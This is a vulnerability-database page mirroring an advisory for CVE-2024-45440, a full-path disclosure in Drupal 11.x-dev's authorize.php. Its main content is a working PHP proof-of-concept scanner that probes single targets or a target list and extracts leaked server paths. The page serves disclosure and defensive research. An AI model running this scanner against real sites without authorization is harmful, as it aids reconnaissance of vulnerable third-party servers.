Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ Drupal 11.x-dev Information Disclosure

๐Ÿ—“๏ธย 12 Dec 2025ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 127ย Views

Drupal 11.x-dev discloses full server path via authorize.php when hash_salt reads a missing file.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Generation of Error Message Containing Sensitive Information in Drupal
10 Feb 202616:18
โ€“githubexploit
Circl		CVE-2024-45440
29 Aug 202413:42
โ€“circl
CNNVD		Drupal ๅฎ‰ๅ…จๆผๆดž
29 Aug 202400:00
โ€“cnnvd
CVE		CVE-2024-45440
29 Aug 202400:00
โ€“cve
Cvelist		CVE-2024-45440
29 Aug 202400:00
โ€“cvelist
Exploit DB		Drupal 11.x-dev - Full Path Disclosure
19 Apr 202500:00
โ€“exploitdb
Github Security Blog		Drupal Full Path Disclosure
29 Aug 202412:31
โ€“github
Nuclei		Drupal 11.x-dev - Full Path Disclosure
2 Jun 202610:14
โ€“nuclei
NVD		CVE-2024-45440
29 Aug 202411:15
โ€“nvd
OpenVAS		Drupal Information Disclosure Vulnerability (GHSA-mg8j-w93w-xjgc) - Linux - Version Check
3 Feb 202500:00
โ€“openvas
Rows per page
=============================================================================================================================================
    | # Title     : Drupal 11.x-dev full Information Disclosure                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.drupal.org/project/drupal/releases/11.x-dev                                                                     |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/190573/ &  CVE-2024-45440
    
    [+] Summary : 
                 The vulnerability exists due to improper error handling in authorize.php when the hash_salt configuration 
    			 attempts to read a non-existent file using file_get_contents(). This reveals the full server path even when error logging is disabled.
    			 
    [+]  POC : 
    
    php poc.php  or http://127.0.0.1/poc.php 
    
    <?php
    /*
     * Drupal 11.x-dev Full Path Disclosure
     * CVE-2024-45440
     * PHP Implementation
     */
    
    class DrupalPathDisclosure {
        private $timeout = 10;
        private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';
        
        public function scan_single($url) {
            echo "[*] Scanning: $url\n";
            
            if (!str_starts_with($url, 'http')) {
                $url = 'http://' . $url;
            }
            
            $full_url = $url . '/core/authorize.php';
            
            try {
                $ch = curl_init();
                curl_setopt_array($ch, [
                    CURLOPT_URL => $full_url,
                    CURLOPT_RETURNTRANSFER => true,
                    CURLOPT_TIMEOUT => $this->timeout,
                    CURLOPT_USERAGENT => $this->user_agent,
                    CURLOPT_FOLLOWLOCATION => false,
                    CURLOPT_SSL_VERIFYPEER => false
                ]);
                
                $response = curl_exec($ch);
                $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
                curl_close($ch);
                
                if ($http_code == 200 && strpos($response, 'settings.php') !== false) {
                    preg_match_all('/<em class="placeholder">(\/.*?settings\.php)/', $response, $matches);
                    
                    if (!empty($matches[1])) {
                        echo "[+] Vulnerable - Paths disclosed:\n";
                        foreach ($matches[1] as $path) {
                            echo "    $path\n";
                        }
                        return true;
                    }
                }
                
                echo "[-] Not vulnerable\n";
                return false;
                
            } catch (Exception $e) {
                echo "[-] Error: " . $e->getMessage() . "\n";
                return false;
            }
        }
        
        public function scan_multiple($file_path) {
            if (!file_exists($file_path)) {
                echo "[-] File not found: $file_path\n";
                return;
            }
            
            $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            $vulnerable = [];
            
            echo "[*] Scanning " . count($urls) . " targets...\n";
            
            foreach ($urls as $url) {
                if ($this->scan_single($url)) {
                    $vulnerable[] = $url;
                }
                echo "\n";
            }
            
            if (!empty($vulnerable)) {
                echo "[+] Summary - Vulnerable hosts:\n";
                foreach ($vulnerable as $host) {
                    echo "    $host\n";
                }
            } else {
                echo "[-] No vulnerable hosts found\n";
            }
        }
    }
    
    // CLI Interface
    if (php_sapi_name() === 'cli') {
        $scanner = new DrupalPathDisclosure();
        
        if ($argc < 2) {
            echo "Usage:\n";
            echo "  php drupal_path.php <url>          - Scan single target\n";
            echo "  php drupal_path.php -f <file>      - Scan multiple targets from file\n";
            echo "\nExamples:\n";
            echo "  php drupal_path.php example.com\n";
            echo "  php drupal_path.php -f targets.txt\n";
            exit(1);
        }
        
        if ($argv[1] === '-f' && isset($argv[2])) {
            $scanner->scan_multiple($argv[2]);
        } else {
            $scanner->scan_single($argv[1]);
        }
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Dec 2025 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.15.3
EPSS0.86689
SSVC
drupal information disclosureauthorize.php error handlinghash_salt file readserver path disclosurecve 2024 45440
127